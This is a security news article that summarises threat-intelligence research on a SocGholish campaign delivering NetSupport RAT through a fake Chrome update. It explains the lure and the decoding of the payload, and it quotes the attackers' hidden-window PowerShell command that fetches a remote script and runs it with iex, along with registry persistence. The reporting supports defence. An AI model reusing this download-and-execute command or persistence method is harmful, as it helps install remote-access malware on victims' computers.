Security experts at the Cyble Research and Intelligence Labs (CRIL) reported a NetSupport (RAT) campaign run by the notorious SocGholish trojan gang. The trojan was being distributed to victims via a fake Google Chrome browser update.
The SocGholish campaign has been active since 2017 and uses several social-engineering techniques to deliver malware to victims. SocGholish is a JavaScript malware framework that can impersonate various programs and websites, including but not limited to internet browsers, communication apps, and Flash Player.
However, in the campaign reported by Cyble, the perpetrators allegedly lured users to a fake Chrome update using a drive-by-download mechanism. Once the user visited the fake download page, the attacker pushed them to download the update, which looked identical to a standard Chrome browser update.
Cyble analyzes the NetSupport (RAT) campaign
According to CRIL, the SocGholish threat actor hosted malicious websites that lured visitors into a call-to-action situation. Once the user's attention was drawn toward the update, the threat actor used drive-by-download techniques (JavaScript or Uniform Resource Locator (URL) redirections) to convince the user to download it.

Once the fake update was downloaded and run, the threat actor deployed an array of follow-on trojans and malware, such as the Cobalt Strike framework, ransomware, and others.
As per the report, the threat actor lured the user into downloading a file named “Сhrome.Updаte.zip,” which was then saved in the user's “Download” folder. Upon analyzing the downloaded zip file, security experts noted that it contained a “heavily-obfuscated JavaScript file” with the name “AutoUpdater.js.” Once executed, it launched a PowerShell command to “download and execute an additional PowerShell script from the remote server.”

The downloaded JavaScript file used the following PowerShell command to fetch a new PowerShell script and invoke it using Invoke-Expression (iex):
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -c "iwr -usebasicparsing hxxp://aeoi[.]pl/15.ico |iex"
Here -w h runs PowerShell with a hidden window, and iwr is the alias for Invoke-WebRequest, so the response body is piped straight into iex and executed without ever being written to disk as a script file.
Upon further investigation, Cyble researchers found that the new PowerShell script was encoded with Base64, an encoding that represents binary data as ASCII text. It was decoded with the [System.Convert]::FromBase64String method and then decompressed with gzip using the [System.IO.Compression.CompressionMode]::Decompress mode.

Once decoded from Base64 and decompressed, the script contained embedded payloads together with deployment code for the “NetSupport RAT” application “whost.exe.” When run, it dropped the payload, and the PowerShell script created a Run registry entry for “whost.exe” so that it started whenever the user logged into the system.

About NetSupport (RAT)

NetSupport Manager is a common RAT (Remote Administration Tool), available on underground hacking forums, that has previously been used to provide remote computer assistance to users, similar to other applications like TeamViewer, AnyDesk, and Quick Assist.
However, cybercriminals appear to have adopted NetSupport Manager as a primary tool for gaining remote access to victims. The RAT version of the program has been decentralized and used in internet-based cybercrime campaigns.
According to the post shared by Cyble, the NetSupport RAT can perform various malicious activities on the victim's devices, including launching applications remotely, identifying crucial data on hard drives and networks, and retrieving system information.